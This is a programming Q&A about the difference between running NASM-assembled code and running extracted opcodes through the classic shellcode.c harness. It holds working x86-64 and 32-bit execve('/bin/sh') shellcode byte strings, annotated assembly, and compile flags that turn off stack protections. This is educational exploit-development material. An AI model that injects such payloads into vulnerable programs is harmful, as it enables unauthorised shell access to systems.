Difference between running an assembly program and running the disassembled code in shellcode.c

Question

I am currently working through Pentester Academy's 'x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure out: what is the exact difference between running an assembly program that has been assembled with NASM and linked with ld, and running the same program's extracted opcodes in the classic shellcode.c program (shown below)? Why use one method over the other?

As an example, when following the first method, I use the commands:

nasm -f elf64 -o execve_stack.o execve_stack.asm
ld -o execve_stack execve_stack.o
./execve_stack

When using the second method, I insert the disassembled shellcode in the shellcode.c program:

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

int main(void) {

    printf("Shellcode length: %d\n", (int)strlen(code));
    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}

... and use the commands:

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode

I have analyzed both programs in GDB and found that addresses stored in certain registers differ. I have also read the answer to the following question (C code explanation), which helped me understand the way the shellcode.c program works. Having said that, I still don't fully understand the exact way in which these two methods differ.

Valy · Accepted Answer

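There is no fundamental difference between the two methods. In both cases you end up executing the same machine instructions on the processor.

The shellcode.c program is just there to demonstrate what happens when you run code that is stored as an array of bytes, here the unsigned char code[] variable. The register and address differences you see in GDB come from how the bytes are reached: the standalone binary starts directly at its entry point, while in shellcode.c the bytes sit in a data array and are called through a function pointer from main, after the C runtime has already set up the stack and registers.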

Why use one method over the other?

I think you are missing the purpose of shellcode and the reasoning behind the shellcode.c program: it shows what happens when an arbitrary sequence of bytes that you control is executed by the processor.

Shellcode is a small piece of machine code that is used to exploit a software vulnerability. An attacker usually injects shellcode into a program by taking advantage of common programming errors such as buffer overflows, and then tries to make the program execute the injected bytes.

A good article showing a step-by-step tutorial on how to generate a shell by performing shellcode injection using buffer overflows can be found here.

Here is what a classic 32-bit shellcode, \x83\xec\x48\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80, looks like in assembly:

sub esp, 72
xor eax, eax
xor edx, edx
push eax
push 0x68732f2f    ; "hs//" (/ is doubled because you need to push 4 bytes on the stack)
push 0x6e69622f    ; "nib/"
mov ebx, esp       ; EBX = address of string "/bin//sh"
push eax
push ebx
mov ecx, esp
mov al, 0xb        ; EAX = 11 (which is the ID of the sys_execve Linux system call)
int 0x80

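In a 32-bit x86 Linux environment, this performs an execve system call with the string "/bin//sh" as the program path. The doubled slash is ignored during path resolution, so the program that runs is /bin/sh.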
